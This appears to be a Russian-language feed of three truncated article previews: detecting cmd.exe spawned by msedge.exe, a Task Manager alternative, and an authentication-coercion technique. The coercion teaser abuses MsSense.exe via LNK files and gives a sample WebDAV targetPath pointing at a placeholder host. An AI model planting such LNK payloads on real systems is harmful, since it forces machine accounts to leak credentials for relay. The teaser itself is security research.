Сегодня я обнаружил попытки запуска cmd.exe из msedge.exe. Такой сигнал, ни в коем случае нельзя игнорировать. Это может быть как признаком глубокого заражения системы, так и (реже) следствием легитимного, но нестандартного поведения. Ведь в моем антивирусе настроен HIPS для чуть более надежной защиты. Подписываемся, чтоб узнать как настроить свой антивирус на максимальную защиту. Давайте разберемся, что происходит и как вам проверить систему. Ситуация может развиваться по двум основным сценариям...

Вектор принуждения к аутентификации машинного аккаунта через LNK-файлы (абьюз MsSense.exe в средах с MDE, когда процесс обрабатывает LNK-файлы, у которых в поле «targetPath» указан URI WebDAV-ресурса: $targetPath = "\\TARGET@80\test\test.txt" При разборе такого пути MsSense.exe выполняет вызов CreateFile, что приводит к попытке аутентификации на произвольном удалённом узле. Статья написана исключительно в образовательных целях. Используйте информацию легально и этично. Автор не несёт ответственности за любое неправомерное использование...

Для многих пользователей зависший компьютер — это всегда сигнал открыть Диспетчер задач и найти виновника среди запущенных программ, чтобы «прибить» то, что тормозит уже полчаса. Но знаете ли вы, что есть инструмент куда мощнее? Я с радостью расскажу о нём! Название «Диспетчер задач» для большинства давно стало синонимом Windows — без этой стандартной утилиты трудно представить себе операционную систему. Нужно мгновенно закрыть зависшую программу? Как обычно, открываем Диспетчер задач. Неясно, чем загружен процессор или куда уходит вся память? Опять же, идём туда же...